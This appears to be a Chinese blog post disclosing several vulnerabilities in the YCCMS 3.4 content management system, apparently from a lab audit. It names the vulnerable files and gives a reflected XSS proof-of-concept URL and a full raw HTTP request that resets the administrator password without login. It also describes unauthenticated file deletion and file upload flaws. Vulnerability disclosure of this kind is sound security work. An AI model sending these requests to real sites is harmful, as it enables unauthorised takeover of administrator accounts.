YCCMS 3.4漏洞集合

分享 154 字 大概 1 分钟 840 次

后台反射型XSS

问题文件:/compile/%%D8^D83^D83C04B9%%createhtml.tpl.php
2020-07-24T07:34:16.png
可以明显看到没有任何防护措施。

/admin/?a=html&art=<script>alert(/xss/)</script>&m=arts

2020-07-24T07:37:24.png

任意文件删除

问题文件:/controller/PicAction.class.php
2020-07-24T07:53:15.png
传入的PID未加处理就进行拼接
2020-07-24T07:57:32.png
1.gif
无需登陆后台就可执行

未授权修改管理员账户

问题文件:/controller/AdminAction.class.php
2020-07-24T09:45:44.png
定位函数 editAdmin()/model/AdminModel.class.php
2020-07-24T09:49:11.png

protected function update($_sql){
        return $this->execute($_sql)->rowCount();
    }
    
protected function execute($_sql){
        try{
            $_stmt=$this->_db->prepare($_sql);
            $_stmt->execute();
        }catch (PDOException $e){
            exit('SQL语句:'.$_sql.'<br />错误信息:'.$e->getMessage());
        }
        return $_stmt;
    }

无需登录即可修改管理员账号密码

POST /admin/?a=admin&m=update HTTP/1.1
Host: 192.168.67.128
Content-Length: 95
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.67.128
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Edg/84.0.522.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.67.128/admin/?a=admin&m=update
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
    
username=admin01&password=admin01&notpassword=admin01&send=%E4%BF%AE%E6%94%B9%E5%AF%86%E7%A0%81

2020-07-24T09:54:04.png

任意文件上传

问题文件:controller\CallAction.class.php
2020-07-31T03:32:27.png
上传点位于‘系统设置-上传LOGO’,无需登录即可上传成功。
2020-07-31T03:31:05.png
上传点位于‘内容管理-添加文章-图片上传’,无需登录即可上传成功。
2020-07-31T03:37:21.png

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想